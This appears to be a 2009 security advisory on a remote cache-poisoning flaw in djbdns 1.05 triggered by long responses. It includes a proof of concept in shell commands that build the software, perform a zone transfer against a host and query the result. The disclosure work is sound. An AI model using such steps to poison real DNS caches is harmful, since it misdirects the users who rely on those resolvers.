

Title djbdns Long Response Packet Remote Cache Poisoning Vulnerability
Published 2009-02-27-12:00AM
Updated 2009-02-27-08:47PM
Class Design Error
CVE  
Remote  Yes
Local  No
Credit  Matthew Dempsky
Vulnerable  djbdns djbdns 1.05
Not Vulnerable  
Code  The following proof of concept is available:

# Download and build ucspi-tcp-0.88.
$ curl -O http://cr.yp.to/ucspi-tcp/ucspi-tcp-0.88.tar.gz
$ tar -zxf ucspi-tcp-0.88.tar.gz
$ echo 'gcc -include /usr/include/errno.h -O' > ucspi-tcp-0.88/conf-cc
$ make -C ucspi-tcp-0.88

# Download and build djbdns-1.05.
$ curl -O http://cr.yp.to/djbdns/djbdns-1.05.tar.gz
$ tar -zxf djbdns-1.05.tar.gz
$ echo 'gcc -include /usr/include/errno.h -O' > djbdns-1.05/conf-cc
$ make -C djbdns-1.05

# Use tcpclient and axfr-get to do a zone transfer for
# www.example.com from www.example2.com.
$ ./ucspi-tcp-0.88/tcpclient www.example.com 53 ./djbdns-1.05/axfr-get www.example.com data data.tmp

# Use tinydns-data to compile data into data.cdb.
$ ./djbdns-1.05/tinydns-data

# Simulate an A query for www.example.com using the data
# from the zone transfer.
$ ./djbdns-1.05/tinydns-get a www.example.com



Copyright 2007, SecurityDot
Wed, 16 Dec 2009 01:17:10 +0000
